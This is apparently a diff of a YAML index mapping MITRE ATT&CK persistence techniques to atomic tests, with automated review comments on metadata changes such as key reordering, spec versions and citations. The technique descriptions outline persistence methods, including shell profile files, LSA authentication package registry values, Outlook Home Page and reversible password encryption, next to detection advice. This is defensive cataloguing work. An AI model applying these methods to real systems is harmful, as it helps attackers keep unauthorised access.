- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Robert Wilson
- - Tony Lambert, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
- type: attack-pattern
- created: '2020-01-24T14:13:45.936Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1546.004
- url: https://attack.mitre.org/techniques/T1546/004
- - source_name: intezer-kaiji-malware
- url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
- description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
- turning to Golang. Retrieved December 17, 2020.'
- - source_name: bencane blog bashrc
- url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
- description: Benjamin Cane. (2013, September 16). Understanding a little more
- about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
- - source_name: anomali-rocke-tactics
- url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
- description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
- Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
- December 17, 2020.
- - source_name: Linux manual bash invocation
- url: https://wiki.archlinux.org/index.php/Bash#Invocation
- description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
- - source_name: Tsunami
- url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
- description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
- Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
- - source_name: anomali-linux-rabbit
- url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
- description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
- Malware Out of a Hat. Retrieved December 17, 2020.
- - source_name: Magento
- url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
- description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
- Vector. Retrieved December 17, 2020.
- - source_name: ScriptingOSX zsh
- url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
- description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
- Files. Retrieved February 25, 2021.'
- - source_name: PersistentJXA_leopitt
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
- for macOS. Retrieved January 11, 2021.
- - source_name: code_persistence_zsh
- url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
- description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
- Retrieved January 11, 2021.
- - source_name: macOS MS office sandbox escape
- url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
- description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
- Retrieved August 20, 2021.
- - source_name: ESF_filemonitor
- url: https://objective-see.com/blog/blog_0x48.html
- description: Patrick Wardle. (2019, September 17). Writing a File Monitor
- with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-25T15:02:24.143Z'
name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
description: "Adversaries may establish persistence through executing malicious
commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
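Review bot: the 78-line removal for T1546.004 here is paired with re-adds in the three following hunks, and all thirteen external references (mitre-attack, intezer-kaiji-malware, bencane blog bashrc, anomali-rocke-tactics, Linux manual bash invocation, Tsunami, anomali-linux-rabbit, Magento, ScriptingOSX zsh, PersistentJXA_leopitt, code_persistence_zsh, macOS MS office sandbox escape, ESF_filemonitor) reappear there, so no citation is lost. The `modified` bump from '2022-04-25T14:00:00.188Z' to '2024-09-25T15:02:24.143Z' lines up with the citation edit made in the `@@ -40380` hunk, which is the only content change in this object beyond reordering.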
@@ -40359,6 +40701,10 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Robert Wilson
+ - Tony Lambert, Red Canary
+ x_mitre_deprecated: false
x_mitre_detection: "While users may customize their shell profile files, there
are only certain types of commands that typically appear in these files. Monitor
for abnormal commands such as execution of unknown programs, opening network
@@ -40369,9 +40715,13 @@ persistence:
events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
most Linux and macOS systems, a list of file paths for valid shell options
available on a system are located in the /etc/shells
file.\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -40380,8 +40730,67 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+ created: '2020-01-24T14:13:45.936Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/004
+ external_id: T1546.004
+ - source_name: anomali-linux-rabbit
+ description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+ Malware Out of a Hat. Retrieved December 17, 2020.
+ url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+ - source_name: anomali-rocke-tactics
+ description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+ Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+ December 17, 2020.
+ url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+ - source_name: Linux manual bash invocation
+ description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+ url: https://wiki.archlinux.org/index.php/Bash#Invocation
+ - source_name: ScriptingOSX zsh
+ description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+ Files. Retrieved February 25, 2021.'
+ url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+ - source_name: bencane blog bashrc
+ description: Benjamin Cane. (2013, September 16). Understanding a little more
+ about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+ url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+ - source_name: macOS MS office sandbox escape
+ description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+ Retrieved August 20, 2021.
+ url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+ - source_name: Magento
+ description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+ Vector. Retrieved December 17, 2020.
+ url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+ - source_name: Tsunami
+ description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+ Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+ url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+ - source_name: PersistentJXA_leopitt
+ description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+ for macOS. Retrieved January 11, 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: code_persistence_zsh
+ description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+ Retrieved January 11, 2021.
+ url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+ - source_name: ESF_filemonitor
+ description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+ with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+ url: https://objective-see.com/blog/blog_0x48.html
+ - source_name: intezer-kaiji-malware
+ description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+ turning to Golang. Retrieved December 17, 2020.'
+ url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.004
atomic_tests:
- name: Add command to .bash_profile
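Review bot: the `bencane blog bashrc` reference now points at a web.archive.org snapshot (`/web/20220316014323/`) with a new retrieval date of September 25, 2024, replacing the original bencane.com URL retrieved February 25, 2021. That is a citation content change, not a reorder, so the commit message should say the original link was swapped for an archived copy and why. The `x_mitre_attack_spec_version` move from 2.1.0 to 3.2.0 with `spec_version` dropped matches the rest of the patch.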
@@ -40567,7 +40976,7 @@ persistence:
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\
with the key value of "Authentication Packages"=<target binary>
. The binary will then be executed by the system when the authentication packages are loaded.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:29:36.291Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Authentication Package
x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -40590,12 +40999,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.002
atomic_tests: []
T1546.015:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:34:29.402Z'
name: 'Event Triggered Execution: Component Object Model Hijacking'
description: "Adversaries may establish persistence by executing malicious content
triggered by hijacked references to Component Object Model (COM) objects.
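Review bot: T1547.002 Authentication Package keeps `x_mitre_attack_spec_version: 2.1.0` (an unchanged context line) while `spec_version: '2.1'` is removed, leaving it on an older attack-spec version than the 3.2.0 the rest of the patch moves to; if the upstream object really is still at 2.1.0 that is fine, but it is worth confirming since every other bumped object in this patch lands on 3.2.0. In the same hunk the T1546.015 `modified` value regresses from '2023-05-09T14:00:00.188Z' to '2023-04-21T12:34:29.402Z', which should be checked against the source object for the same reason.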
@@ -40673,41 +41081,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.015
atomic_tests: []
T1137.004:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
- type: attack-pattern
- created: '2019-11-07T20:09:56.536Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.004
- url: https://attack.mitre.org/techniques/T1137/004
- - source_name: SensePost Outlook Home Page
- url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
- description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
- Ruler Vector. Retrieved February 4, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
- - source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
- description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
- provides blue teams with the ability to detect Ruler usage against Exchange.
- Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:02:13.742Z'
name: 'Office Application Startup: Outlook Home Page'
description: |
Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
@@ -40716,27 +41094,54 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'Process: Process Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
+ created: '2019-11-07T20:09:56.536Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/004
+ external_id: T1137.004
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SensePost NotRuler
+ description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+ provides blue teams with the ability to detect Ruler usage against Exchange.
+ Retrieved February 4, 2019.
+ url: https://github.com/sensepost/notruler
+ - source_name: SensePost Outlook Home Page
+ description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
+ Ruler Vector. Retrieved February 4, 2019.
+ url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.004
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
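Review bot: the substantive T1137.004 changes in this hunk are buried under key reordering and are easy to miss: `x_mitre_permissions_required` (Administrator, User) is removed, `Office 365` becomes `Office Suite` in `x_mitre_platforms`, `x_mitre_attack_spec_version` goes from `2.1.0` to `3.2.0`, and `x_mitre_deprecated: false` and `revoked: false` are new. The lines removed in the preceding hunk (id, created, external_references) are re-added here in a different position and order, so that is a move rather than a deletion; all three references (SensePost Outlook Home Page, Microsoft Detect Outlook Forms, SensePost NotRuler) survive. Emitting keys in a fixed order from the generator would keep future refreshes down to the real changes, and any tooling that reads `x_mitre_permissions_required` needs a fallback now that the field is gone.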
@@ -40797,7 +41202,6 @@ persistence:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1037.005:
@@ -40841,7 +41245,7 @@ persistence:
mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
StartupItems run during the bootup phase of macOS, they will run as the elevated
root user."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:43:21.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Startup Items'
x_mitre_detection: |-
@@ -40863,7 +41267,6 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.005
atomic_tests: []
T1078.002:
@@ -40944,7 +41347,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.003:
technique:
@@ -40967,7 +41369,7 @@ persistence:
description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
Active Directory Users and Computers in Windows Server 2008. Retrieved November
15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:25.625Z'
name: Network Logon Script
description: "Adversaries may use network logon scripts automatically executed
at logon initialization to establish persistence. Network logon scripts can
@@ -40997,12 +41399,10 @@ persistence:
- 'File: File Modification'
- 'Process: Process Creation'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1197:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:21:40.927Z'
name: BITS Jobs
description: |-
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
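Review bot: after this hunk the T1037.003 object has neither `spec_version` nor `x_mitre_attack_spec_version`, whereas the sibling objects in this patch keep `x_mitre_attack_spec_version` (`3.1.0` or `3.2.0` a few lines further on). Together with `modified` reverting to `2020-03-24T23:45:25.625Z`, this suggests the upstream object for T1037.003 is an older bundle that never carried the attack-spec field; confirm that is the case rather than the generator silently dropping it, and document that the field is optional so consumers do not assume it is always present.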
@@ -41092,12 +41492,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1197
atomic_tests: []
T1546.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:45.568Z'
name: 'Event Triggered Execution: AppInit DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -41182,7 +41581,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.010
atomic_tests: []
T1546.002:
@@ -41247,18 +41645,17 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.002
atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -41291,10 +41688,9 @@ persistence:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
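Review bot: the platform list for T1556.009 drops `SaaS` as well as `Azure AD`, leaving `IaaS` and the new `Identity Provider`. Replacing `Azure AD` with `Identity Provider` matches the description change (Azure AD to Entra ID) in the previous hunk, but removing `SaaS` narrows scope beyond a rename, so confirm it is the upstream platform list for version `1.1` and not an omission in a mapping table; Okta and JumpCloud, both named in the description, would otherwise be covered only through `Identity Provider`.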
@@ -41331,7 +41727,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.001:
technique:
@@ -41405,7 +41800,7 @@ persistence:
benign software. Launch Agents are created with user level privileges and
execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
OceanLotus for OS X) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-21T16:13:00.598Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Create or Modify System Process: Launch Agent'
x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -41433,12 +41828,11 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.001
atomic_tests: []
T1505:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T21:18:29.349Z'
name: Server Software Component
description: 'Adversaries may abuse legitimate extensible development features
of servers to establish persistent access to systems. Enterprise server applications
@@ -41497,33 +41891,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.001:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
- type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
@@ -41544,6 +41915,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -41558,52 +41930,42 @@ persistence:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1556.005:
- technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.005:
+ technique:
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
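Review bot: this hunk interleaves the rewrite of T1556.001 with the removal of the T1556.005 header block, because the diff matched `type: attack-pattern`, `created_by_ref` and `- source_name: mitre-attack` across the two objects, which makes it error-prone to review as one unit. The net effect checks out: T1556.001 keeps its three references (mitre-attack, Dell Skeleton, TechNet Audit Policy) in a new order and gains `revoked: false`, `x_mitre_platforms: [Windows]`, `x_mitre_version: '2.1'` and `x_mitre_attack_spec_version: 3.2.0`, while losing `x_mitre_permissions_required: [Administrator]`; the five T1556.005 references deleted here are all re-added in the hunk after next. A refresh that preserved key order would have produced two readable hunks instead of this one.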
@@ -41625,6 +41987,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -41635,23 +41998,50 @@ persistence:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
